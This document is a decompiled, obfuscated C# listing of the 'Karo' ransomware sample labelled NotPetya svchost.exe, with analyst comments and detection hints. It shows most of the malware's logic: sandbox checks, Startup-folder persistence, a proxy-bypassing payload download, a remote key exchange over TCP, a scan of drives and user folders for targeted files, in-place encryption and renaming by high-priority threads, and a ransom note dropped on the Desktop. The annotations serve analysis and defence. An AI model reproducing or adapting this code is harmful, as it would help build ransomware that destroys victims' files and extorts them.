Form1 from Karo. NotPetya svchost.exe
using ;
using ;
using ;
using ;
using ;
using IWshRuntimeLibrary;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Net;
using System.Net.Sockets;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
namespace karo
{
public sealed class Form1 : Form
{
// Compiler-generated holder for Form1's non-capturing lambdas: <>9 is the
// shared instance and the <>9__N_M fields cache the delegates built from the
// three methods below. The member names were removed by the obfuscator, so
// each method is described only by its signature and visible body.
[CompilerGenerated]
[Serializable]
internal sealed class <>c
{
public static readonly Form1.<>c <>9;
public static Func<ManagementObject, object> <>9__19_0;
public static Func<DriveInfo, bool> <>9__24_0;
public static Func<Process, bool> <>9__24_1;
// String-lookup delegate (type from SmartAssembly.Delegates). Calls of the
// form Form1.<>c.(N) fetch a literal by numeric ID, so no plaintext strings
// appear in this listing.
[NonSerialized]
internal static GetString ;
static <>c()
{
// Note: this type is marked as 'beforefieldinit'.
// Installs the string-lookup delegate for this type before first use.
Strings.CreateGetStringDelegate(typeof(Form1.<>c));
Form1.<>c.<>9 = new Form1.<>c();
}
// Selector over WMI objects: passes the object and string 5618 to a stripped
// call and returns the result - presumably a property read; TODO confirm.
internal object (ManagementObject managementObject)
{
return global::.~(managementObject, Form1.<>c.(5618));
}
// Drive filter. The loop, labels and constant conditions (false, 3 == 0) are
// control-flow obfuscation; the result reduces to
//   first-call(driveInfo) && second-call(driveInfo) == DriveType.Fixed
// i.e. fixed drives only. The first call is presumably a readiness check.
internal bool (DriveInfo driveInfo)
{
bool arg_26_0;
while (true)
{
if (false)
{
goto IL_0E;
}
int arg_0C_0 = global::.~˜(driveInfo) ? 1 : 0;
IL_0C:
if (arg_0C_0 != 0 || 3 == 0)
{
goto IL_0E;
}
if (false)
{
continue;
}
arg_26_0 = ((arg_0C_0 = 0) != 0);
IL_23:
if (!false)
{
break;
}
goto IL_0C;
IL_0E:
arg_26_0 = ((arg_0C_0 = ((.~–(driveInfo) == DriveType.Fixed) ? 1 : 0)) != 0);
goto IL_23;
}
return arg_26_0;
}
// Process filter: compares a value read from the process with string 20042.
// Presumably a match on process name - decode the string to confirm.
internal bool (Process process)
{
return global::.(global::.~†(process), Form1.<>c.(20042));
}
}
// Instance and static state of the form. Every field name was stripped by the
// obfuscator, so uses elsewhere in the listing (this.) cannot be matched to a
// particular declaration; the notes below rely on type and initializer only.
// Host identifiers captured at construction: machine name and user name.
private readonly string  = Environment.MachineName;
private readonly string  = Environment.UserName;
private string ;
private string  = string.Empty;
private string ;
private int ;
// A string set and a queue; the main routine fills a set with file paths and
// then builds a Queue<string> from it for the worker threads.
private readonly HashSet<string>  = new HashSet<string>();
private Queue<string>  = new Queue<string>();
private byte[] ;
// Per-user ApplicationData directory.
private readonly string  = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
private bool ;
private string ;
// Per-user temp directory.
private readonly string  = Path.GetTempPath();
// String set filled by a stripped helper; presumably the file extensions that
// the scan in the main routine tests with Contains - TODO confirm.
private readonly HashSet<string>  = new HashSet<string>(global::..());
// Shared socket and child-process handles used by the main routine.
private static Socket ;
private static Process ;
// Fixed eight-byte constant 1..8. NOTE(review): its consumer is not visible in
// this listing; check which stripped helper reads it.
internal readonly byte[]  = new byte[]
{
1,
2,
3,
4,
5,
6,
7,
8
};
// Presumably the WinForms designer "components" container; it is disposed in
// the protected override at the end of the class.
private IContainer  = null;
// String-lookup delegate for Form1 (see the static constructor).
[NonSerialized]
internal static GetString ;
// Constructor: hands the new instance to a single stripped helper - presumably
// the designer-generated component initialisation; TODO confirm.
public Form1()
{
global::..(this);
}
// Event handler (object, EventArgs). With the constant conditions and labels
// removed (they are control-flow obfuscation) it does four things in order:
// one stripped call with (this, 100.0), two stripped calls with (this, false),
// then a parameterless instance method. Presumably form-appearance setters
// that keep the window out of sight, followed by the main routine - the names
// are stripped, so confirm in a deobfuscated build.
internal void (object obj, EventArgs eventArgs)
{
if (!false)
{
}
if (3 == 0)
{
goto IL_29;
}
global:: expr_07 = global::.;
double expr_0E = 100.0;
if (!false)
{
expr_07(this, expr_0E);
}
IL_1D:
global::.(this, false);
IL_28:
IL_29:
global:: expr_29 = global::.;
bool expr_30 = false;
if (true)
{
expr_29(this, expr_30);
}
if (false)
{
goto IL_1D;
}
this.();
if (!false)
{
return;
}
goto IL_28;
}
// Main routine of the sample. Every string literal is fetched by numeric ID
// through the obfuscator's lookup delegate (Form1.(N)), and most framework
// calls go through delegates whose names were stripped. The notes below state
// only what the visible types, constants and call shapes establish; anything
// marked "presumably" must be confirmed against the decoded strings.
// Almost every step sits in a try block with an empty catch, so failures are
// swallowed and leave no trace in the sample's own behaviour.
public void ()
{
while (true)
{
bool flag = false;
try
{
try
{
// Stage 1 - WMI query (query text = string 22). For each result, values read
// under keys 71 and 117 are compared with strings 88, 126, 139 and 148; any
// match sets flag. Presumably an analysis-environment check - TODO confirm.
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(Form1.(22));
try
{
ManagementObjectCollection managementObjectCollection = global::.~(managementObjectSearcher);
try
{
ManagementObjectCollection.ManagementObjectEnumerator managementObjectEnumerator = global::.~(managementObjectCollection);
try
{
while (global::.~•(managementObjectEnumerator))
{
ManagementBaseObject managementBaseObject = global::.~(managementObjectEnumerator);
string text = global::.~(global::.~(global::.~(managementBaseObject, Form1.(71))));
bool flag2 = (global::.(text, Form1.(88)) && global::.~(global::.~(global::.~(global::.~(managementBaseObject, Form1.(117)))), Form1.(126))) || global::.~(text, Form1.(139)) || global::.(global::.~(global::.~(managementBaseObject, Form1.(117))), Form1.(148));
if (flag2)
{
flag = true;
}
}
}
finally
{
if (managementObjectEnumerator != null)
{
global::.~(managementObjectEnumerator);
}
}
}
finally
{
if (managementObjectCollection != null)
{
global::.~(managementObjectCollection);
}
}
}
finally
{
if (managementObjectSearcher != null)
{
global::.~(managementObjectSearcher);
}
}
}
catch
{
}
// On a match: start a windowless process (FileName = string 165, Arguments =
// string 222), then call two stripped helpers, the second with 0 - presumably
// termination. The same 165/222 launch recurs in the outer finally block.
bool flag3 = flag;
if (flag3)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(222)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo);
global::.ƒ();
.‡(0);
}
catch
{
}
}
global::..();
// Persistence: a shortcut named by string 311 is created in the user's Startup
// folder, targeting a file named by string 328 under ApplicationData.
// Detection: a new shortcut in the per-user Startup folder whose target lies
// in the roaming profile.
WshShell wshShell = new WshShellClass();
string pathLink = .‹(.Š(Environment.SpecialFolder.Startup), Form1.(311));
IWshShortcut wshShortcut = (IWshShortcut)wshShell.CreateShortcut(pathLink);
wshShortcut.TargetPath = .‹(.Š(Environment.SpecialFolder.ApplicationData), Form1.(328));
wshShortcut.Save();
// Worker-thread count: 1 by default, replaced when the value looked up under
// string 345 converts to an int. Used as the loop bound where threads start.
int num = 1;
try
{
string text2 = .(Form1.(345));
bool flag4 = text2 != null;
if (flag4)
{
try
{
num = global::.–(text2);
}
catch
{
}
}
}
catch
{
}
// text3 is derived from the System special folder and is compared with each
// drive during the scan. The drive list is filtered with the cached DriveInfo
// predicate from the <>c class (fixed drives only).
string text3 = .Ž(.Š(Environment.SpecialFolder.System));
IEnumerable<DriveInfo> arg_369_0 = .˜();
Func<DriveInfo, bool> arg_369_1;
if ((arg_369_1 = Form1.<>c.<>9__24_0) == null)
{
arg_369_1 = (Form1.<>c.<>9__24_0 = new Func<DriveInfo, bool>(Form1.<>c.<>9.));
}
IEnumerable<DriveInfo> enumerable = arg_369_0.Where(arg_369_1);
// State file named by string 374: when present its content is read back into
// fields; otherwise a fresh value comes from a helper called with 32, is
// written to that file, and the file is marked Hidden. The same path is
// removed near the end of the routine.
bool flag5 = .™(.‹(this., Form1.(374)));
if (flag5)
{
this. = .~(.œ(), .Ÿ(.‹(this., Form1.(374))));
this. = .~(.œ(), this.);
this. = .~(.(), this.);
}
else
{
this. = global::..(32);
this. = .~(.œ(), this.);
this. = .~(.(), this.);
try
{
€.(.‹(this., Form1.(374)), .~(.œ(), this.));
.(.‹(this., Form1.(374)), FileAttributes.Hidden);
}
catch
{
}
}
// (Re)creates the file named by string 328 - the shortcut target above - from
// the value returned by a stripped parameterless call (presumably this
// executable's own path; TODO confirm).
bool flag6 = .™(.‹(this., Form1.(328)));
if (flag6)
{
try
{
‚.(.‹(this., Form1.(328)));
„.(ƒ.(), .‹(this., Form1.(328)));
}
catch
{
}
}
bool flag7 = !.™(.‹(this., Form1.(328)));
if (flag7)
{
try
{
„.(ƒ.(), .‹(this., Form1.(328)));
}
catch
{
}
}
// text4 comes from a helper called with 5 and is used below as a path
// component for the download and its extraction directory.
string text4 = global::..(5);
.  = new .();
bool flag8 = !.š(this.);
if (flag8)
{
†.(this.);
}
// Marker check: if the item named by string 383 exists and reading it yields
// a Length of exactly 11, every process accepted by the cached Process
// predicate is passed to one stripped call (presumably terminated).
// Otherwise the download branch runs.
bool flag9 = .š(.‹(this., Form1.(383))) && ‡.(.‹(this., Form1.(383))).Length == 11;
if (flag9)
{
try
{
IEnumerable<Process> arg_6C9_0 = ˆ.();
Func<Process, bool> arg_6C9_1;
if ((arg_6C9_1 = Form1.<>c.<>9__24_1) == null)
{
arg_6C9_1 = (Form1.<>c.<>9__24_1 = new Func<Process, bool>(Form1.<>c.<>9.));
}
IEnumerator<Process> enumerator = arg_6C9_0.Where(arg_6C9_1).GetEnumerator();
try
{
while (global::.~–(enumerator))
{
Process current = enumerator.Current;
if (current != null)
{
global::.(current);
}
}
}
finally
{
if (enumerator != null)
{
global::.~(enumerator);
}
}
}
catch
{
}
}
else
{
// Download loop: fetches the URI in string 392 to a local file (name parts
// text4 + string 513), retrying with no limit and no delay until the call
// succeeds. Proxy = null makes WebClient bypass the system proxy, so this
// request will be absent from proxy logs; look for it in firewall, NetFlow
// or endpoint network telemetry.
while (true)
{
try
{
WebClient webClient = new WebClient
{
Proxy = null
};
‹.~(webClient, new Uri(global::..(Form1.(392))), Š.(this., text4, Form1.(513)));
}
catch
{
continue;
}
break;
}
// Sanity checks on the download: it must exist and be at least 4000 KB,
// otherwise the outermost loop restarts from the WMI check.
bool flag10 = !.™(Š.(this., text4, Form1.(513)));
if (false)
{
goto IL_1114;
}
if (flag10)
{
continue;
}
FileInfo fileInfo = new FileInfo(Š.(this., text4, Form1.(513)));
int num2 = (int)(Œ.~(fileInfo) / 1024L);
bool flag11 = num2 < 4000;
if (flag11)
{
continue;
}
// Opens the download through a stripped helper and hands each enumerated
// entry to another helper together with the text4 directory - presumably
// archive extraction; TODO confirm the container format.
global::.  = global::..(Š.(this., text4, Form1.(513)));
try
{
IEnumerator<global::.> enumerator2 = .();
try
{
while (global::.~–(enumerator2))
{
global::. current2 = enumerator2.Current;
global::..(.., current2, .‹(this., text4));
}
}
finally
{
if (enumerator2 != null)
{
global::.~(enumerator2);
}
}
}
finally
{
if ( != null)
{
global::.~();
}
}
bool flag12 = !.š(.‹(this., text4));
if (flag12)
{
continue;
}
// Post-extraction housekeeping: a series of one- and two-string file
// operations over paths built from strings 513 to 871, ending with a call
// that takes the text4 directory and true (presumably a recursive delete).
// Which two-string operation each line is (copy, move or write) cannot be
// told from this listing.
‚.(Š.(this., text4, Form1.(513)));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(539)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(572)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(605)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(718)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(751)), ƒ.()));
„.(Š.(this., text4, Form1.(522)), .‹(global::..(Form1.(796)), ƒ.()));
„.(Š.(this., text4, Form1.(845)), .‹(this., Form1.(845)));
„.(.‹(this., Form1.(854)), .‹(this., Form1.(871)));
‚.(.‹(this., Form1.(854)));
.‚(.‹(this., text4), true);
// Windowless launch of the string-165 program with arguments assembled from
// strings 908 and 925 around a field value.
try
{
ProcessStartInfo processStartInfo2 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = Š.(Form1.(908), this., Form1.(925)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo2);
}
catch
{
}
}
global::. ;
// Network set-up loop. A helper program (path from string 962, arguments from
// string 1011, working directory from string 1036) is started windowless with
// stdout redirected and kept in the static Process field.
while (true)
{
Form1. = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = .‹(this., global::..(Form1.(962))),
Arguments = global::..(Form1.(1011)),
UseShellExecute = false,
RedirectStandardOutput = true,
CreateNoWindow = true,
WorkingDirectory = .‹(this., global::..(Form1.(1036)))
}
};
global::.~—(Form1.);
// TCP endpoint: address from string 1049, port 9056. After a stripped call
// with 10000 (presumably a ten-second wait) the code opens a stream socket to
// it and sends one message built from string 1066, retrying forever on error.
IPEndPoint iPEndPoint = new IPEndPoint(.„(global::..(Form1.(1049))), 9056);
.ˆ(10000);
while (true)
{
try
{
Form1. = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
.~†(Form1., iPEndPoint);
‘.~ˆ(Form1., .~(.(), .‹(global::..(Form1.(1066)), ƒ.())));
}
catch
{
continue;
}
break;
}
// Helper object bound to loopback ports 8181 and 9055.
// NOTE(review): a bundled helper process plus local ports 9055/9056 and a
// local relay on 8181 resembles an anonymising proxy with a control port -
// confirm from the decoded strings. Detection: loopback listeners on 8181,
// 9055 and 9056 owned by a recently dropped executable.
 = new global::.(IPAddress.Loopback, 8181, IPAddress.Loopback, 9055, global::...);
// First request through that object, assembled from strings 1095, 1160, 1173
// and 1182 plus field values. The reply decides the path: containing string
// 1195 leaves the loop for the cleanup label; containing string 1204 tears
// down the helper process and socket and retries; anything else continues.
this. = global::..(, ’.‰(new string[]
{
Form1.(1095),
.,
Form1.(1160),
this.,
Form1.(1173),
global::..(this),
Form1.(1182),
this.
}));
bool flag13 = global::.~(this., Form1.(1195));
if (flag13)
{
break;
}
bool flag14 = global::.~(this., Form1.(1204));
if (flag14)
{
try
{
global::.~(Form1.);
“.~Š(Form1., SocketShutdown.Both);
global::.~(Form1.);
continue;
}
catch
{
continue;
}
goto IL_EE3;
}
goto IL_EE3;
}
goto IL_16AC;
IL_EE3:
// A helper is called with 2048 and two field values and its result is stored
// in a field - presumably key material; the helper is not visible here. A
// second request (strings 1213, 1282) is then repeated with no limit until
// the reply contains string 1291.
this. = this.;
string text5 = this.;
string text6 = this.;
this. = global::..(2048, text6, text5);
bool flag15;
do
{
this. = global::..(, ”.‹(Form1.(1213), ., Form1.(1282), this.));
flag15 = !global::.~(this., Form1.(1291));
}
while (flag15);
// Five windowless launches of the string-165 program, with arguments from
// strings 1304, 1385, 1450, 1515 and 1580. NOTE(review): what these commands
// do is not recoverable from this listing; decode the strings before drawing
// conclusions. Detection: a burst of hidden child processes of one parent
// immediately before mass file modification.
try
{
ProcessStartInfo processStartInfo3 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1304)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo3);
}
catch
{
}
try
{
ProcessStartInfo processStartInfo4;
if (!false)
{
processStartInfo4 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1385)),
UseShellExecute = false,
CreateNoWindow = true
};
}
global::.‚(processStartInfo4);
}
catch
{
}
try
{
ProcessStartInfo processStartInfo5 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1450)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo5);
}
catch
{
}
try
{
ProcessStartInfo processStartInfo6 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1515)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo6);
}
catch
{
}
IL_1114:
try
{
ProcessStartInfo processStartInfo7 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1580)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo7);
}
catch
{
}
// Drive scan: for each filtered drive that passes a bool check and a
// comparison with text3 (presumably skipping the system drive), a helper
// enumerates paths under it. A path is added to a set when a value derived
// from it (presumably its extension) passes the comparison with string 1641 -
// the suffix appended to processed files - and is in the target string set.
IEnumerator<DriveInfo> enumerator3 = enumerable.GetEnumerator();
try
{
while (global::.~–(enumerator3))
{
DriveInfo current3 = enumerator3.Current;
bool flag16 = global::.~˜(current3) && global::.Ž(global::.~(current3), text3);
if (flag16)
{
IEnumerable<string> enumerable2 = global::..(global::.~(current3));
IEnumerator<string> enumerator4 = enumerable2.GetEnumerator();
try
{
while (global::.~–(enumerator4))
{
string current4 = enumerator4.Current;
bool flag17 = !.š(current4);
if (flag17)
{
string text7 = .(current4);
bool flag18 = global::.Ž(text7, Form1.(1641));
if (flag18)
{
bool flag19 = this..Contains(text7);
if (flag19)
{
this..Add(current4);
}
}
}
}
}
finally
{
if (enumerator4 != null)
{
global::.~(enumerator4);
}
}
}
}
}
finally
{
if (enumerator3 != null)
{
global::.~(enumerator3);
}
}
// The same filter is then applied to five user folders: Desktop, Personal
// (Documents), DesktopDirectory, MyMusic and MyPictures.
List<string> list = new List<string>
{
.Š(Environment.SpecialFolder.Desktop),
.Š(Environment.SpecialFolder.Personal),
.Š(Environment.SpecialFolder.DesktopDirectory),
.Š(Environment.SpecialFolder.MyMusic),
.Š(Environment.SpecialFolder.MyPictures)
};
foreach (string current5 in list)
{
IEnumerable<string> enumerable3 = global::..(current5);
IEnumerator<string> enumerator6 = enumerable3.GetEnumerator();
try
{
while (global::.~–(enumerator6))
{
string current6 = enumerator6.Current;
bool flag20 = !.š(current6);
if (flag20)
{
string text8 = .(current6);
bool flag21 = global::.Ž(text8, Form1.(1641));
if (flag21)
{
bool flag22 = this..Contains(text8);
if (flag22)
{
this..Add(current6);
}
}
}
}
}
finally
{
if (enumerator6 != null)
{
global::.~(enumerator6);
}
}
}
// The collected paths become the work queue. If it is non-empty, num
// foreground threads at Highest priority are started (presumably on the
// per-file worker method) and this thread polls the queue count, with a
// stripped call taking 500 between polls, until it reaches zero.
// Detection: sustained high-priority file rewriting and renaming across user
// folders and non-system fixed drives by one process.
this. = new Queue<string>(this.);
bool flag23 = this..Count == 0;
if (!flag23)
{
this..Clear();
this. = true;
for (int i = 0; i < num; i++)
{
Thread thread = new Thread(new ThreadStart(this.))
{
IsBackground = false,
Priority = ThreadPriority.Highest
};
global::.~(thread);
}
while (this..Count != 0)
{
.ˆ(500);
}
// Third request (strings 1650, 1711), repeated with no limit until the reply
// contains string 1724.
bool flag24;
do
{
this. = global::..(, –.(new object[]
{
Form1.(1650),
.,
Form1.(1711),
this.
}));
flag24 = !global::.~(this., Form1.(1724));
}
while (flag24);
// Reads a text template through a stream keyed by string 1733 (presumably an
// embedded resource), substitutes string 1775 with a value built from field
// data, and places the result at DesktopDirectory + string 1758. The same
// path is passed to a stripped call in the outer finally block.
StreamReader streamReader = new StreamReader(˜.~(—.Ž(), Form1.(1733)));
try
{
string text9 = global::.~(streamReader);
„.(.‹(.Š(Environment.SpecialFolder.DesktopDirectory), Form1.(1758)), ™.~(text9, Form1.(1775), ’.‰(new string[]
{
Form1.(1788),
this.,
Form1.(1801),
.,
Form1.(1810),
this.,
Form1.(1801),
.,
Form1.(1815)
})));
}
finally
{
if (streamReader != null)
{
global::.~(streamReader);
}
}
// Purpose not visible: a path built from text4 and strings 1824/1829 is
// passed to a helper with string 1838; on true, a second helper receives it.
string text10 = ”.‹(this., Form1.(1824), text4, Form1.(1829));
bool flag25 = global::..(text10, Form1.(1838), );
if (flag25)
{
global::..(this, text10);
}
}
IL_16AC:
// Cleanup: the helper process and the socket are shut down, and the state
// file named by string 374 is removed if it still exists.
try
{
global::.~(Form1.);
bool flag26 = !global::.~™(Form1.);
if (flag26)
{
global::.~(›.(š.~’(Form1.)));
}
“.~Š(Form1., SocketShutdown.Both);
global::.~(Form1.);
}
catch
{
}
try
{
bool flag27 = .™(.‹(this., Form1.(374)));
if (flag27)
{
‚.(.‹(this., Form1.(374)));
}
}
catch
{
}
}
catch (Exception var_78_178D)
{
}
finally
{
// Runs on every exit path, including after an exception: the Desktop file
// named by string 1758 is passed to a stripped call (presumably opened for
// the user), the string-165 program is launched windowless with the
// arguments in strings 222 and 1891, and a final stripped call follows
// (presumably termination).
try
{
œ.(.‹(.Š(Environment.SpecialFolder.DesktopDirectory), Form1.(1758)));
}
catch
{
}
try
{
ProcessStartInfo processStartInfo8 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(222)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo8);
ProcessStartInfo processStartInfo9 = new ProcessStartInfo
{
FileName = global::..(Form1.(165)),
Arguments = global::..(Form1.(1891)),
UseShellExecute = false,
CreateNoWindow = true
};
global::.‚(processStartInfo9);
}
catch
{
}
global::.ƒ();
}
break;
}
}
// Per-file worker. Takes one path from the shared queue, rewrites the file
// through a stripped transform helper that receives a byte[] field (presumably
// the key), then applies a two-string operation with the path plus string 1641
// (presumably a rename) and bumps a counter passed by ref.
// Three cases, relevant when assessing damage and recovery:
//   1. a value read from FileInfo (presumably the extension) equals one of the
//      listed strings (IDs 1980..2135): the whole file is transformed;
//   2. otherwise, size under 5000 bytes: the whole file is transformed;
//   3. otherwise: only the first 4096 bytes are replaced and the rest of the
//      file is left as it was on disk.
// When the byte[] field is null, cases 1 and 2 skip the rewrite and only the
// final two-string operation runs, while case 3 still writes its 4096-byte
// buffer, which is then all zeros.
// All exceptions are swallowed by the empty catch.
public void ()
{
bool flag = this..Count == 0;
if (flag)
{
// Queue drained: clear the running flag that is tested at the end.
this. = false;
}
else
{
try
{
string text = this..Dequeue();
bool flag2 = text != null;
if (flag2)
{
FileInfo fileInfo = new FileInfo(text);
// Case 1 test: 22 comparisons against decoded strings (ID 2026 occurs twice).
bool flag3 = global::.(global::.~(fileInfo), Form1.(1980)) || global::.(global::.~(fileInfo), Form1.(1989)) || global::.(global::.~(fileInfo), Form1.(1998)) || global::.(global::.~(fileInfo), Form1.(2003)) || global::.(global::.~(fileInfo), Form1.(2012)) || global::.(global::.~(fileInfo), Form1.(2021)) || global::.(global::.~(fileInfo), Form1.(2026)) || global::.(global::.~(fileInfo), Form1.(2035)) || global::.(global::.~(fileInfo), Form1.(2044)) || global::.(global::.~(fileInfo), Form1.(2049)) || global::.(global::.~(fileInfo), Form1.(2054)) || global::.(global::.~(fileInfo), Form1.(2063)) || global::.(global::.~(fileInfo), Form1.(1829)) || global::.(global::.~(fileInfo), Form1.(2072)) || global::.(global::.~(fileInfo), Form1.(2081)) || global::.(global::.~(fileInfo), Form1.(2090)) || global::.(global::.~(fileInfo), Form1.(2099)) || global::.(global::.~(fileInfo), Form1.(2108)) || global::.(global::.~(fileInfo), Form1.(2117)) || global::.(global::.~(fileInfo), Form1.(2126)) || global::.(global::.~(fileInfo), Form1.(2135)) || global::.(global::.~(fileInfo), Form1.(2026));
if (flag3)
{
// Whole-file path: read all bytes, transform, write back in place.
byte[] array = .Ÿ(text);
bool flag4 = this. != null;
if (flag4)
{
byte[] array2 = global::..(this., array, this);
bool flag5 = array2 != null;
if (flag5)
{
€.(text, array2);
}
}
„.(text, .‹(text, Form1.(1641)));
.(ref this.);
}
else
{
// Case 2 test: the same FileInfo read that is divided by 1024 in the main
// routine, so the threshold is in bytes.
bool flag6 = Œ.~(fileInfo) < 5000L;
if (flag6)
{
byte[] array3 = .Ÿ(text);
bool flag7 = this. != null;
if (flag7)
{
byte[] array4 = global::..(this., array3, this);
bool flag8 = array4 != null;
if (flag8)
{
€.(text, array4);
}
}
„.(text, .‹(text, Form1.(1641)));
.(ref this.);
}
else
{
// Case 3: read the first 4096 bytes, transform them, copy the result into a
// fixed 4096-byte buffer, then reopen the file (FileMode.Open, so it is not
// truncated) and write that buffer through a BinaryWriter.
byte[] array5 = new byte[4096];
BinaryReader binaryReader = new BinaryReader(ž.(text, FileMode.Open));
try
{
bool flag9 = this. != null;
if (flag9)
{
byte[] array6 = Ÿ.~(binaryReader, 4096);
byte[] array7 = this.;
byte[] array8 = global::..(array7, array6, this);
.(array8, array5, array8.Length);
}
}
finally
{
if (binaryReader != null)
{
global::.~(binaryReader);
}
}
BinaryWriter binaryWriter = new BinaryWriter(ž.(text, FileMode.Open));
try
{
.~(binaryWriter, array5);
}
finally
{
if (binaryWriter != null)
{
global::.~(binaryWriter);
}
}
„.(text, .‹(text, Form1.(1641)));
.(ref this.);
}
}
}
}
catch (Exception var_19_61A)
{
}
}
// While the running flag is set, a stripped helper is called with this
// instance - presumably it schedules the next file; TODO confirm.
bool flag10 = this.;
if (flag10)
{
global::..(this);
}
}
// Protected override taking a bool - presumably Form.Dispose(bool). The loop,
// labels and constant conditions (8 != 0, 3 == 0, false, true) are control-flow
// obfuscation. The logic reduces to: when flag is true and the instance field
// is non-null, pass that field to one stripped call (presumably Dispose on the
// components container); then always pass (this, flag) to a final stripped
// call (presumably the base implementation).
protected override void (bool flag)
{
while (true)
{
if (8 != 0)
{
if (!flag)
{
goto IL_14;
}
int arg_4B_0 = (this. != null) ? 1 : 0;
IL_15:
bool flag2 = arg_4B_0 != 0;
do
{
bool expr_4E = (arg_4B_0 = (flag2 ? 1 : 0)) != 0;
if (3 == 0)
{
goto IL_12;
}
if (!expr_4E)
{
goto IL_35;
}
}
while (false);
if (true)
{
goto IL_25;
}
goto IL_14;
IL_12:
goto IL_15;
IL_14:
arg_4B_0 = 0;
goto IL_15;
}
goto IL_25;
IL_35:
if (!false)
{
break;
}
continue;
IL_25:
global::.~(this.);
goto IL_35;
}
global::.(this, flag);
}
// Static constructor: installs the obfuscator's string-lookup delegate for
// Form1, which every Form1.(N) call in this class goes through. Recovering the
// literals behind those numeric IDs is the first step in analysing the sample.
static Form1()
{
// Note: this type is marked as 'beforefieldinit'.
Strings.CreateGetStringDelegate(typeof(Form1));
}
}
}